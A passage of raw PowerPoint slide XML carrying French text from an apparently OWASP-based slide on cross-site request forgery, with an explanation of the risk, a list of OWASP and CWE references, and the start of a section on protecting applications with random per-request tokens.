              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>envoyées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatiquement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>navigateurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n’assurent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aucune</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la falsification de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inter site, car </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aussi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systématiquement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>envoyés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> avec les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requêtes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forgées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’outil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CSRF Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> aider à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>générer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des tests pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>démontrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les dangers des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>failles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3356992" y="6732240"/>
            <a:ext cx="3501008" cy="241176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en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP CSRF Article</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP CSRF Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP CSRFGuard - CSRF Defense Tool </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ESAPI Project Home Page </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>ESAPI HTTPUtilities Class with AntiCSRF Tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on CSRF Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP CSRFTester - CSRF Testing Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 352 on CSRF </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="323232"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3356992" y="4067944"/>
            <a:ext cx="3501008" cy="2664296"/>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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protéger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>méthode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> standard  de protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nécessite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’ajouter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jeton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aléatoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chaque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jetons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doivent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, au minimum, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>être</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
